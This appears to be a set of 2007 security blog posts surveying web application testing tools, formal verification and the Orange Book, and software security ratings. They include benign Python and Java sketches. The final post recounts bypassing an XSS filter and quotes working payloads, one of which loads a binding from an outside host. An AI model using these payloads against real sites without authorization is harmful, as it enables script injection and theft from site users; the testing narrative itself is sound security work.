is a reference platform for fault-injection and fuzz testing of web
applications, which provides source for every vulnerability check.
Unfortunately, it's the commercial Cenzic
Hailstorm.
Also unfortunately, this means learning another language: Javascript,
but web application security testers should possibly make learning
Javascript (and Flash) a priority over Python, C, or Ruby. CORE
Impact (also commercial) has begun to
add the low-hanging fruit exploits (although they claim no XSS yet), and
it is imagined that ImmunitySec will do so as well (and these could be
open-sourced like the SQL
Hooker tool). For
now, the Metasploit, GNUCITIZEN
AttackAPI, and the
BeEF framework appear to be the
dominant exploit tools for web applications. The
W3AF framework uses BeEF, but also
includes many modules (some pinned for future release) that allow for
pivoting including an RFI proxy, as well as using log or source code
information to continue a more advanced attack. There are concepts such
as XSS Tunneling (to run Nessus or similar through a man-in-the-browser
exploit) and W3AF's Virtual Daemon (integrating web application exploits
with Metasploit payloads).
In fact, finding web application vulnerabilities is often more than just
program understanding along with standard fault-injection and fuzz
testing. There are many intricacies to finding XSS and SQLi -- even
other critical vulnerabilities such as HTTP Splitting/Smuggling can take
many forms (see: Amit Klein on
HRS).
Fortunately, many of these are covered in The Web Application Hacker's
Handbook, in fairly clever detail. The book even covers triple-encoded
XSS attacks, second-order SQLi, OOB SQLi, and inference attacks. Almost
all examples use the Burp Suite, as the
primary author (Portswigger) also wrote that tool. The book makes
special mention of some other
point-tools, including the
aforementioned inference attacks using
Absinthe. SQLi
can also benefit from non-standard methods such as using
PQL.
Earlier in this entry, I mentioned some Firefox add-ons such as
UrlParams. There exists a similar add-on that can be used as an HTTP
editor (but only to modify requests, not responses):
TamperData. While Portswigger mentions it in
his book, he doesn't cover it as well as he should. TamperData
can be opened in the sidebar and looks surprisingly similar to UrlParams
-- this has great benefit, especially when testing for low-hanging fruit
SQLi, XSS, and HRS vulnerabilities; as well as path traversal, logical
flaws, URL redirection, and similar vulnerabilities which require direct
tampering of the HTTP request headers. If you want to build advanced
attacks, besides Hailstorm or Burp Scanner/Suite I can also recommend
Wfuzz (written in Python)
and
CAL9000
(a browser driver, ideal for testing XSS in several different browsers
using the same tool). Of course, there is the original HTTP/CGI attack
tool, which has recently made a comeback as Nikto
2.
One tool is mentioned that I had not heard of before, and interestingly,
the approaches given to attack authentication, session management, and
access control are very different from the approaches that I propose
(and the tools that I use). The
CookieWatcher
add-on is proposed as a way of looking for session ID's in applications
under test. This is an excellent idea, and I've already integrated it
into my testing strategies, as it is easy to change which session ID
type you are looking for (it's the only tool option/preference, which
has a drop-down menu that shows a list of cookies seen), delete, or copy
(as well as view it in the status bar). While the lack of options is
somewhat aggravating, the add-on works well along with
CookieSwap (to
have switchable cookie profiles),
CookieSafe (to
turn first and third party cookies off on a case-by-case basis),
CookieCuller (to permanently protect
cookies), and Add N Edit Cookies
(to use the Cookie Editor to modify content, path, security, or expire
information, as well as to add completely new cookies). WebScarab,
Stompy, and the forthcoming
Burp
Sequencer
are probably excellent tools for session ID analysis, and the book
covers how to do this in detail, while pointing to the excellent NIST
FIPS 140-2 standard, which has four levels of validation criteria.
Interesting characteristics that may affect authentication or session ID
randomization include IP address, BGP prefix, DNS forward or reverse
entries, time, and HTTP Referer or User-Agent. Tools such as
RefControl, User Agent
Switcher,
Tor, and
pbounce should be used
when testing for authentication (IP, DNS, and Referer authentication
checks should also be configuration or source-code assisted if
possible).
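Here's a crude Python sketch of one piece of that analysis: collect a
batch of fresh session IDs and measure per-position entropy. The target
URL and cookie name are placeholders, and this is no substitute for the
FIPS 140-2 style statistical testing the book covers::

    import math
    import urllib.request
    from collections import Counter
    from http.cookies import SimpleCookie

    def grab_session_id(url, cookie_name="JSESSIONID"):
        """Request the page anonymously and pull the fresh session cookie."""
        resp = urllib.request.urlopen(url)
        jar = SimpleCookie(resp.headers.get("Set-Cookie", ""))
        return jar[cookie_name].value if cookie_name in jar else None

    def positional_entropy(samples):
        """Sum Shannon entropy per character position -- a crude signal."""
        total = 0.0
        for column in zip(*samples):
            counts = Counter(column)
            n = len(column)
            total += -sum(c / n * math.log2(c / n) for c in counts.values())
        return total

    ids = [grab_session_id("http://target.example/login") for _ in range(50)]
    ids = [i for i in ids if i]
    if ids:
        print("total positional entropy: %.1f bits" % positional_entropy(ids))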
A lot of the functionality of the Burp Suite is utilized rather
effectively in the book as well. However, the lack of inclusion of
certain web application security aspects, such as Ajax security,
automated DOM-based XSS scanning, and Web services security also happen
to be problems with the Burp Suite itself. For Ajax crawling, I suggest
checking out all the work done by Shreeraj
Shah (especially Crawling Ajax-driven
Web 2.0
Applications
and Scanning Ajax for XSS entry
points), including
his new BlueInfy tools. For DOM-based
XSS, the W3AF tool has a
module to support this
that is equivalent to Shreeraj's work. Web services security is also
best covered by Shreeraj Shah, although there will be a few books coming
out in the next month that should re-address the issues of Ajax and Web
services rather well. From my experience, the OWASP
Interceptor
tool, as well as the commercial (free limited version)
SOAPSonar tool are good starting points
for Web services security testing outside of Shreeraj's tools already
mentioned. There are fuzzers, including the OWASP
WSFuzzer,
SIFT,
and iSecPartner's WSBang,
as well as generic XML fuzzers such as
untidy and
Schemer.
It is strange that, without mentioning much about Ajax, XML, or Web
services, the authors included a very detailed section on JSON
Hijacking and CSRF. While I was familiar with both CSRF
dorks and CSRF
Redirectors, the
book contains excellent material on how to test (although does not
provide a tool reference). Most recently, OWASP released a new project
called
CSRFTester,
which looks promising. OWASP has a lot of great projects, but their
integration (I agree with Ory
Segal
on this) could be vastly improved. There are very unique tools such as
Pantera
(Python extensible) and
ProxMon (also Python
extensible) that do passive analysis for web application security
testing, which can save countless hours of manual penetration-testing
using TamperData or Burp Suite. I often wish that other tools such as
the THC releases and
Foundstone free
tools could
also be combined, as I often reference these tools for the SSL checking
support as well as a variety of other reasons.
Other tools such as
DirBuster,
JBroFuzz, and DFF
Scanner can be used for
predictable resource locations (PRL) -- especially while using ProxMon
or Pantera passive analysis techniques (or by using these with
FileMon/RegMon/Process Monitor on the Windows IIS web server, or strace,
lsof, fstat, ktrace, or truss on the Apache/Unix web server). I expect
the w3af and Burp Scanner will both integrate full Javascript crawlers,
Flash walkers, and other advanced RIA features in the future -- which
could even surpass the CWE-Compatible web application security scanners
out there. In addition to this, they should add passive analysis tools
and work with "agents" available in "white-box assisted" tests, such as
the case with ImmunitySec's SQL Hooker as well as the PRL techniques
described at the beginning of this paragraph. There will probably be
four different types of agents: 1) the standard local proxy that sits in
between the browser and the web server, 2) an agent that monitors the
code/files/services/queries on the web server, 3) a proxy agent that
sits in between the web server and database server (or other external
services) and monitors like a testing spy (e.g. JDBC spy), and 4) an
agent that monitors the code/queries on a database server or other
external web service. Nobody has built this yet, but since we're on the
topic, this is what I'd like to see in modern web application scanning
tools. Maybe these agents or passive tools will also be able to measure
code coverage and web surface coverage in a similar way that the
commercial tools, Fortify
Tracer and Chorizo
Scanner (and the open-source
Grabber/Crystal)
accomplish this through bytecode instrumentation or other hooks.
For the year 2008, I'd like to see replacement of standbys like RSnake's
XSS Cheat Sheet. While incredibly useful to me in 2006, it no longer
holds its weight compared to the WASC Script
Mapping project and
tools such as .mario's PHP Charset Encoder,
or Gareth Heyes'
Hackvertor.
One of the biggest lessons I learned about software weaknesses (SQLi and
XSS in particular) is that there is a concept of low-hanging fruit
(LHF), but at some point after the root-cause is found, more complex
attacks often work. However, this is largely true only when a security
tester has full source-code and framework knowledge. In this instance, a
spreadsheet such as the one found in the Microsoft Press' Hunting
Security Bugs companion
content,
"Reference -- ASP.NET Control Encoding", can be used to figure out which
classes encode on a per HTML, Script, or URI basis. What I've been
describing for a while now is what will be known as hybrid analysis, with
hybrid (static + dynamic) tools becoming more rapidly available to
security testers.
For web applications, there are some great open-source static analysis
tools that can get a penetration-tester started in using a source-code
assisted black-box testing method. For PHP there is
Inspekt,
Pixy,
RATS,
SWAAT,
PHP-SAT,
PHPSecAudit,
PSA3, and
FIS
(File Inclusion Scanner, with the extended tool,
WebSpidah). For Java, there is
Milk (based on
Orizon),
LAPSE,
and SWAAT (only JSP). ASP classic and ASP.NET have ASP
Auditor, SWAAT, and
DN_BOFinder. Javascript
has JSLint. There are also static code
analysis tools specifically built for
browsers, such as
Oink and
DeHydra.
Speaking of browsers, I promised some information on fuzzing browsers
(to include ActiveX as well). First of all, we must mention Michal
Zalewski, who not only recently brought us Bunny The
Fuzzer, but also started
a modern version of the Crusades to create a battle between browsers and
web applications when he wrote
MangleMe. hdm
followed with a bunch of
tools: Hamachi, CSSDIE,
DOM-Hanoi, and AxMan (for ActiveX similar to iDefense's
COMRaider). Before these guys, PROTOS had
c05-http-reply,
and eEye was still thinking about
TagBruteForcer.
Even the Mozilla team released a tool,
jsfuzzfun
this year, including
collaboratively
with
Opera.
The latest comes from GNUCITIZEN as WEB CLIENT
FUZZER.PY and
Ronald as BrowserFry.
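A MangleMe-style generator is simple enough to sketch in Python: emit
pages of malformed, randomly-nested markup, serve them to a browser
running under a debugger, and watch for crashes. The tag and attribute
lists here are arbitrary::

    import random

    TAGS = ["a", "b", "div", "iframe", "img", "marquee", "object", "table"]
    ATTRS = ["href", "src", "style", "width", "height", "background", "onload"]

    def junk(n=16):
        """Mix plain bytes, meta-characters, and random Unicode code points."""
        out = []
        for _ in range(n):
            pool = [0x41, 0x25, 0x3C, 0x3E, 0x22,
                    random.randrange(1, 0x110000)]
            out.append(chr(random.choice(pool)))
        return "".join(out)

    def mangled_page(elements=200):
        out = ["<html><body>"]
        for _ in range(elements):
            tag = random.choice(TAGS)
            out.append('<%s %s="%s">%s' % (tag, random.choice(ATTRS),
                                           junk(), junk(8)))
            if random.random() < 0.3:    # leave most tags unclosed on purpose
                out.append("</%s>" % tag)
        out.append("</body></html>")
        return "".join(out)

    for i in range(100):
        with open("testcase_%03d.html" % i, "w",
                  encoding="utf-8", errors="replace") as f:
            f.write(mangled_page())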
Robert Hansen (RSnake) recently spoke at OWASP AppSec 2007 about Web
Browser (In)-Security (slides not available yet, so I don't know what he
covered). It's true that 89% of security vulnerabilities in browser
plug-ins from this year were in ActiveX applications. However, that
doesn't mean that you shouldn't keep your browser, Adobe Flash
Player, Java
installation, Adobe
Reader,
QuickTime, Windows Media
Player,
and Mozilla extensions
up-to-date at
all times. It also doesn't necessarily mean that
IE
is more insecure than Firefox, Opera, or Safari. They're all insecure
and it's your job to find out where and why. RSnake did release some
very cool code this year with the Master Recon
Tool (aka Mr.
T). Expect to see more available
at Jay Beale's ClientVA website (and read
his presentation from Toorcon 9 on that same page).
Outside of regular security testing at home or in the lab, I'd like to
address the two commercial Software-as-a-Service (SaaS) solutions
available as outside security testing augmentation. WhiteHat
Security makes a product called Sentinel,
which embodies the WASC Threat
Classification (i.e. a way
of understanding attack-paths against web applications). WhiteHat has a
mature understanding of web application vulnerabilities from an attacker
perspective, which is ideal for people that are learning how to think
like an attacker. Veracode also provides a
service, SecurityReview, which also happens to be CWE-Compatible (and
the only commercial solution that has to-date formally passed the
criteria besides SofCheck, an Ada source code analyzer). CWE is
invaluable information that can be given back to developers in order to
fix security vulnerabilities and avoid software weaknesses in coding
efforts.
For embedded systems such as the iPhone, or routers such as those made
by Cisco Systems, there is plenty of research out there to get you
started. If the device has a web browser, try using JS
Commander to proxy a low-featured (but
working) Javascript debugger. FX has plenty of material in The
Shellcoder's Handbook (2nd Edition) to get someone started on finding
vulnerabilities or writing exploits for Cisco IOS. The BinNavi tool has support
for at least Cisco IOS and Juniper ScreenOS, as well as a few other key
architectures. If any area is in need of formal methods for security
testing - it's software that is burned into hardware - so consider
taking embedded hardware security to the next level by referencing my
previous blog entry on Formal Methods and Security.
Posted by Dre on Saturday, November 24, 2007 in
Hacking and
Security.
Most information security practices, whether system, network,
application, software, or data -- come from original sources such as the
Orange Book. Most people assume that the Orange Book is no longer valid
for use in security today. If we had built systems around the Orange
Book concepts -- then why are we so insecure today? It must be outdated,
right?!
The Orange Book was primarily about two things: functionality and
assurance. Sound
familiar?
There is an implication that functionality and assurance (or usability
and security) are at odds with each other. The Orange Book and I would
agree that this is not the case. There are obvious problems with
building systems that "share" everything and "allow access to
everything". Assuming perfect authentication and session management --
"trusted" users are given access to the resources they need to perform
actions that become functional to them. There are many ways to control
authorization to these resources ranging from programmatic,
discretionary (DAC), mandatory (MAC), role-based (RBAC), and declarative
controls. By adding controls on a per-user/session basis -- the
security
policy of the
system forms a "privilege matrix" of sorts. This privilege model becomes
the ultimate means of formally verifying a system. If only there
weren't two major problems with this way of thinking: object reuse
(shared disk or memory concepts such as the stack and heap) and covert
channels (not just IPC/sockets, but also storage and timing channels),
which both exist completely outside of the privilege matrix.
The Orange Book defines assurance in four divisions (D, C, B, and A), A1
being the highest level of security. The idea behind A1 is that access
control matrices (secure kernel, trusted path, and authorized users of a
system accessing resources) are formulated into security policy models.
These models must be formally verified to be considered A1.
Interestingly enough, the source-code itself did not need to be
formally verified. Formal specification and verification of source-code
goes beyond A1. If I know most of our readers, point yourself towards
the TCSEC article on Wikipedia
now.
But what are formal specification and verification and how would you
apply these concepts to source-code? Formal specification is an example
of a formal method. In today's world of modern applications, especially
web applications -- many development shops already perform the basics of
formal specification. Developers usually do this when they perform
business modeling, write requirements right (not write the right
requirements), and perform design before the implementation phase (i.e.
coding). It is thought by many that this is the perfect time to start
thinking about security.
Foundstone
claims that 70% of issues found during security testing (in the years
2005-2006) were discovered during threat-modeling and code review vs.
the other 30% which comes from vulnerability assessments. However,
according to
Gartner
-- security testing is done at the programming phase by 5 to 10 percent
of enterprises, 20 percent in the pre-deployment phase, and at
operations/maintenance phases by the remaining 70 percent. According to these
statistics, enterprises are clearly not writing security policy model
documentation as formal specifications, nor do they even know how to
formally verify a project's documentation -- let alone its source-code.
Automated formal methods are rarely ever used for making sure that
software even "works" let alone whether software is "secure". The first
step is to formally describe your system in a language that an automated
formal verification tool can understand. Most software engineers feel
that their source code should speak for itself (but then again, most
developers can't even do a
walkthrough of
their code in front of an audience on the same day that they wrote it).
Nor do they want to talk about security early in the process.
For these special moments, there are many ways of tackling the problem
of raising the bar of security assurance.
The largest problem will remain with how the access control works in the
application, often considered business logic or "flaw"-related security
issues. Access control issues are hard to find, and finding them is
usually a manual effort.
It's difficult to re-design or re-write access control into an existing
application. Often, the design of the access control system is
sufficient for the application use -- but instead the developers forgot
to take into account the other problems with security: object reuse and
covert channels. These sorts of issues are typically semantic in nature
or "bug"-related security problems in the application. In standalone,
thick-client applications -- "patches" are often used to fix security
"bugs". A full-upgrade is usually required to fix security "flaws". With
web applications, either bugs or flaws can be deployed in parallel --
thus making it easier to address all types of security issues. However,
web applications also require re-coding, as modern attacks utilize
software weaknesses that affect input/output (whose root-cause is
typically improper validation and/or encoding), while pre-2005
attacks
were often against standalone applications that affected a single data
reference error (i.e. parser). Parser bugs typically have a root-cause
related to a buffer overflow, integer, or format string vulnerability.
Using source-code is probably a good way to formally verify any of these
type of "bug" security issues, but most interesting is that it can also
be used to identify "flaws" in the application logic as well.
There are many reasons that formal methods are not popular for finding
security issues in source-code. Assume that a formal specification has
already been written that describes what a system is and does.
Additionally, assume that the security correctness properties of such a
system have also been formally specified. In order to check these
properties against a system, one more thing has to be determined before
automated formal methods can be used. The size of state space can be
either small/finite, or extremely large (and possibly infinite). If the
state space is small, then all reachable states can be checked for each
property against the system model and verify that each is true. This is
known as
model-checking. If the
state space is too large to check every state, logical expressions can
be used to determine whether properties are always true. As opposed to
model-checking, automated
theorem-proving
attempts to logically prove theorems about the model, instead of
checking every state. This works by using propositional logic,
which starts with a set of axioms and applies rules to derive
additional true statements.
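To make that less abstract, here's a toy explicit-state model checker in
Python. It breadth-first searches every reachable state of a tiny
two-process mutual-exclusion model and checks a safety property in each
state -- SPIN and JPF do essentially this, at vastly greater scale::

    from collections import deque

    # A state is (pc0, pc1, lock); pc values: 0 idle, 1 waiting, 2 critical.
    def tuple_set(t, i, v):
        return t[:i] + (v,) + t[i + 1:]

    def successors(state):
        for proc in (0, 1):
            pc, lock = state[proc], state[2]
            if pc == 0:                              # request the lock
                yield tuple_set(state, proc, 1)
            elif pc == 1 and lock == 0:              # acquire when free
                yield tuple_set(tuple_set(state, proc, 2), 2, 1)
            elif pc == 2:                            # release
                yield tuple_set(tuple_set(state, proc, 0), 2, 0)

    def safe(state):
        # Safety property: never both processes in the critical section.
        return not (state[0] == 2 and state[1] == 2)

    def model_check(initial):
        """Exhaustively search reachable states; return a counterexample."""
        seen, frontier = {initial}, deque([initial])
        while frontier:
            state = frontier.popleft()
            if not safe(state):
                return state
            for nxt in successors(state):
                if nxt not in seen:
                    seen.add(nxt)
                    frontier.append(nxt)
        return None

    print(model_check((0, 0, 0)) or "property holds in every reachable state")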
When a model-checker is run, a positive result raises the typical
pen-tester worry: "if it didn't find any problems, you're still not sure
whether there are any". A negative result from a model-checker can be
useful for debugging those specific problems (which conditions cause
which errors). Theorem-provers, which are more interactive, can be
hand-checked on a positive result. A negative result from a
theorem-prover is useless, simply because it only shows that the
properties couldn't be proved. The first time I heard of an automated
model-checker used for security purposes was when NIST
used SPIN to check the IPSec protocols and
state spaces for correctness. Recently, I've also come across Java
PathFinder, which provides a
more modern solution for automated model-checking.
I've always been curious as to who uses these tools and for what
reasons. It's possible that they are coming into maturity and can be
used to provide higher levels of software security assurance that
haven't typically been reached easily through other types of effort. Any
project with a realistic development deadline is never going to use one
of these tools as they exist today -- but what about open-source
projects, especially ones that remain rather static over time? It would
be interesting to use open-source to improve formal methods for security
testing, as well as to use formal methods to check security in
open-source projects. Coverity has its
Scan project, where they test open-source
C/C++ projects (and now
Java) using
their static analysis tool, Prevent
SQS.
Organizations outside of Coverity can use SPIN or Java PathFinder (JPF)
for model-checking. JPF, in particular, is interesting because it
re-implements a JVM, providing a second opinion on a class file's
validity. This also presents limitations: external APIs are not
available for testing, which eliminates JDBC and J2EE from being
included, since the full Sun JDK API implementations aren't available in
JPF. However, for self-contained programs or components, JPF can be
great for analyzing runtime behavior, especially if extended to support
a critical component in the security trust chain of a modern
application. For example, some work has been done
using JPF to diagnose errors in the
Log4J
logging package.
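As a hypothetical example of the kind of self-contained program JPF
handles well, consider a lost-update race. Ordinary testing passes
almost every run, but JPF backtracks over the scheduler's choices and
can deterministically reach the one interleaving that breaks the
assertion (class and field names below are mine):

// Toy JPF target: run it under JPF with a config naming this class as
// the target, and JPF explores the thread interleavings and reports the
// schedule that violates the assertion. (Outside JPF, run with -ea.)
public class RacyCounter {
    static int count = 0;  // shared and unsynchronized on purpose

    public static void main(String[] args) throws InterruptedException {
        Runnable inc = new Runnable() {
            public void run() { count++; }  // read-modify-write, not atomic
        };
        Thread t1 = new Thread(inc);
        Thread t2 = new Thread(inc);
        t1.start(); t2.start();
        t1.join(); t2.join();
        assert count == 2 : "lost update: count = " + count;
    }
}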
There are many building blocks for building secure Java applications
that could stand to benefit from formal method testing. Log4J is one
example, but there are plenty of other pre-built components that can be
tested -- such as Reform, ACEGI, Commons Validator, Jasypt, JCE, JAAS,
Cryptix, BouncyCastle, HDIV, and HttpClient. Components which use
cryptography stand to inherit the most value from this sort of testing,
as timing attacks and side-channel attacks can be verified using formal
methods. There will continue to be organizations that "roll their own"
encryption, but if we can improve the assurance levels of existing
components, the organizations that use them stand to gain higher levels
of assurance in the authentication, session management, authorization,
and other formally verified components of their web applications.
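The timing-attack point deserves an example. A property like "run time
does not depend on secret data" is invisible to functional testing, but
it is exactly the kind of property a formal analysis can state and
check. A sketch of the difference, with method names of my own
invention:

// Sketch of the property, not any particular library's implementation.
public class ConstantTime {
    // Leaks timing: returns at the first mismatching byte, so an attacker
    // who can measure response times may recover a MAC byte-by-byte.
    static boolean leakyEquals(byte[] a, byte[] b) {
        if (a.length != b.length) return false;
        for (int i = 0; i < a.length; i++)
            if (a[i] != b[i]) return false;  // early exit is the side channel
        return true;
    }

    // Constant-time: always touches every byte and accumulates differences,
    // so run time is independent of where (or whether) a mismatch occurs.
    static boolean constantTimeEquals(byte[] a, byte[] b) {
        if (a.length != b.length) return false;
        int diff = 0;
        for (int i = 0; i < a.length; i++)
            diff |= a[i] ^ b[i];  // no data-dependent branch
        return diff == 0;
    }
}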
Formal methods exist completely outside of other types of security
testing, and allow uncovering of subtleties such as property states and
timing. The gains in overall robustness and in debugging assistance can
alone be enough to justify including formal methods in an advanced
security testing methodology. However, it may be extremely daunting to
start one of these projects, as the barrier to entry is very high.
For a good place to start, consider a codebase such as Log4J that
implements neither encryption nor authorization, but also never
terminates. Using temporal
logic [1], model the states
of the application and determine properties that hold along a sequence
of events (a couple of example properties are sketched below). Temporal
logic [2]
is a type of formal logic which provides a precise human/machine
language to talk about things that may have been skipped over. When
formally specifying authentication protocols, usually only the message
exchange is talked about in documentation, while the conclusions each
party draws from a message exchange may be left out completely. BAN
logic can
formally specify what parties perceive and conclude during use of an
authentication protocol and handshake. Using BAN logic, model the
assertions based on multiple autonomous parties -- and test using ACEGI
or similar.
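For instance, here are two properties one might state for a Log4J-like
logger, written in SPIN's ASCII syntax for linear temporal logic ([]
means "always", <> means "eventually"; the proposition names are made
up):

[] (appended -> <> flushed)   /* every appended event is eventually flushed */
[] !(writer1 && writer2)      /* two threads never write the log at once */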
There are much easier ways to find security-related bugs and flaws using
both source code and runtime checking than by using formal methods. For
example, static source analysis, static bytecode analysis, fuzzing, and
fault-injection testing can be combined at implementation or build time
using well-known tools such as Fortify SCA, FindBugs (or FxCop), CUTE
(or Compuware SecurityChecker), and AppScan DE (or DevInspect). Many
security testers have expressed concern over these types of tools, since
they usually only take semantic bugs into account -- not design issues
or logical flaws. Many logical flaws exist around access control, and
they often appear in web applications; this has more to do with
authentication, session management, and authorization than any other
security weakness. Using top-level formal specifications to denote
access control can save design inspectors a lot of time (a small example
follows below). This could be improved further by both verifying the
formal specifications for access control and mapping the design to the
source code when performing manual code review.
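As a sketch of what such a top-level specification might look like --
rough Z-style notation, with illustrative names -- access control
reduces to a small relation that a design inspector can eyeball and a
code reviewer can map onto the application's decision points:

allowed ⊆ Role × Operation
allowed == { (admin, read), (admin, write), (user, read) }
∀ r : Role; o : Operation • access(r, o) ⇔ (r, o) ∈ allowed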
There are few automated penetration-testing tools that help with
multi-user scenarios when dealing with access control or logical flaw
problems in web application security testing. Cenzic Hailstorm can run
traversals with multiple credentials, and Burp Intruder can use the
extract grep
option, alone or along with recursive
grep.
Outside of access control, most logical flaws will still require design
inspection along with manual code review, combined with a bit of luck.
However, formal methods such as model-checkers and theorem-provers
provide an advanced way of dealing with these types of issues.
Microsoft Research has produced
SLAM (isn't this now called the
Visual Studio Management Model Designer, or VSMMD?),
Fugue, and
the source code annotation
language
(SAL, which appears similar to Java's
JSR-305, Annotations for
Software Defect Detection -- sketched below) for use with formal
methods. There are also semiformal methods such as
MDA and
MDE, which
have automated tools as well. But using any of these tools (semiformal
or formal) typically requires enough of a mathematical background to
write a formal specification, often done using the Z
notation. That is
radically complex for the average development environment -- even when a
critical component requires a higher level of assurance. Instead, we are
stuck with standard security testing, and so many classes of flaws are
never uncovered.
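For what the JSR-305 side of that comparison looks like: annotations
from the proposed javax.annotation package let a checker such as
FindBugs treat design rules as verifiable metadata. A small sketch (the
interface is mine; the annotations are from the JSR-305 proposal):

import javax.annotation.CheckReturnValue;
import javax.annotation.Nonnull;

// Annotated contract: callers must not pass null, and must not ignore
// the authorization decision -- violations of either become tool findings.
public interface Authorizer {
    @CheckReturnValue
    boolean authorize(@Nonnull String user, @Nonnull String action);
}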
In the end, I think the Orange Book went very far to describe what is
needed for an assured system. Today, there is little chance that we can
build common applications with as granular and pedantic an approach to
safety or security as the TCSEC A1 division. However, the largest
takeaway for me is that requirements and designs should be as precise as
possible, and inspected during review. If a design includes an access
control privilege matrix, security testing can be modified to verify
that matrix (a sketch follows below). Ideally, there would be some sort
of automated language-to-test conversion, such as Microsoft SAL or
JSR-305. This would allow even coverage of both semantic bugs and
logical flaw security issues in modern applications.
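Here is a minimal sketch of what verifying a privilege matrix could look
like; the matrix literal and the checkAccess() stub are stand-ins for
the real design document and the application's actual decision point:

import java.util.*;

// Hypothetical harness: walk every (role, operation) cell of the
// design's privilege matrix and compare it against the application's
// actual answer.
public class PrivilegeMatrixTest {
    static final Map<String, Set<String>> MATRIX =
        new HashMap<String, Set<String>>();
    static final Set<String> ALL_OPS =
        new HashSet<String>(Arrays.asList("read", "write", "delete"));
    static {
        MATRIX.put("admin",
            new HashSet<String>(Arrays.asList("read", "write", "delete")));
        MATRIX.put("user",
            new HashSet<String>(Arrays.asList("read")));
    }

    public static void main(String[] args) {
        for (String role : MATRIX.keySet())
            for (String op : ALL_OPS) {
                boolean expected = MATRIX.get(role).contains(op);
                boolean actual = checkAccess(role, op);  // app under test
                if (actual != expected)
                    System.out.println("FAIL: " + role + "/" + op +
                        " expected " + expected + " got " + actual);
            }
    }

    // Stub standing in for the real access control decision point.
    static boolean checkAccess(String role, String op) {
        Set<String> ops = MATRIX.get(role);
        return ops != null && ops.contains(op);
    }
}

The point is the shape of the test: the design artifact becomes test
data, so every cell of the matrix -- including the deny cells that
manual testing habitually skips -- gets exercised.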
Posted by Dre on Friday, November 23, 2007 in
Defense and
Security.
Roger Halbheer, Chief Security Advisor for Microsoft Europe, Middle
East, and Africa, posted a comment last week in response to my post on
"Operating Systems are only as secure as the idiot using
it."
Roger is looking for some open discussion on improving the security
usability problem, instead of sitting back and complaining about it.
I have posted a
response
to his comment, and Dre has put some thought into his reply as well.
Some highlights:
Security engineering is not easy, and history has proven time and
time again that humans are fallible. We need to design secure
systems from the ground up, taking into account every distant node of
every network, both logical and physical. Take a banking application,
for example; not only does the site have to be secure and free of
flaws, but so do the out-of-band channels used for transport
communications, such as account creation, recovery, etc.
From Dre:
While reading, "Geekonomics: The Real Cost of Insecure Software"
and speaking with people at Fortify Software, Veracode, Cigital, and
MITRE... I'm sold on the concept of a five-star "software
security assurance" rating system for both commercial and
open-source software to solve the "stem" of this user+security
problem...
...get the five-star rating system published everywhere, on the
software boxes, in newspapers, magazines, and everywhere the product
name goes. Make it a part of consumer reports; make it the most
important part of consumer reports. Make sure that expiration dates
are also published with the ratings, and have a place online where
people can go to check all the latest information on their software
security assurance ratings for all the applications that they use.
This doesn't even begin to scratch the surface of Dre's post. Definitely
check it out; it's a worthy read.
Posted by Marcin on Monday, November 19, 2007 in
Security.
So the other day I was doing a web site review and looking for XSS
issues. I came across one ASP form that used various URL parameters to
make up parts of the form. Well, I poked around and tried injecting
the usual, <script>alert('xss')</script>. The page went straight to
a 404 Not Found, so it must have been doing some kind of filtering. I
tried using various cases of <script> and also UTF-8 encoding the
script.
Nothing was working here, so I put in <scrpt> and the page worked -- I
saw the tag being inserted into the page. The page was filtering on the
word "script", so I knew I had to work around it somehow.
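Pure guesswork on my part, but behind the scenes the filter probably
amounted to something like this (sketched in Java for illustration):

// 404 anything containing the literal word "script" -- and miss every
// payload that doesn't need the word, like an <img> tag with an onerror
// handler.
static boolean naiveFilter(String input) {
    return input.toLowerCase().contains("script");
}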
What I ended up doing, was injecting an image tag that pointed to
nothing, and an onerror event. Like so:
<img src="" onerror=alert(/xss/)>
And voilà! XSS within five minutes. This was a pretty simple case, and
the blacklist was not comprehensive at all, but it goes to show there
will always be ways around a filter. Also, be sure to use more than a
single browser when testing web applications for security flaws: not
every attack will work in both Firefox and IE. Take the following, which
I used against a search page in IE only:
</XSS/*-*/STYLE=xss:e/**/xpression(alert(1337))>
On another page, "onerror" was being filtered, so I had to work around
that. I needed something a little better, so I skipped the image and
script tags, and went straight to the input tags. I ended up using:
" style="-moz-binding:url('http://h4k.in/')>
This brings me to a couple of new resources I came across, thanks to
.mario in the #slackers IRC channel. During the
development and ongoing testing of the PHP-IDS
project, .mario wrote this awesome PHP Charset
Encoder. An interesting
thread
also came up in our discussion -- pretty cool stuff that could be used
in evading filters. If
RTL looks familiar
to you, like it did to me... perhaps you've seen RSnake's weird "Dolce
& Gabanna" page? Right click
> View Source and take a look at some of the tags; one of them is RTL.
Now to decipher the rest of that HTML code. hahaha. Oh, one last thing
to wrap this post up... Don't forget the XSS Cheat
Sheet, also available in
XML for use in your own scripts.
It's been really useful these past couple days.
Posted by Marcin on Thursday, November 15, 2007 in
Security.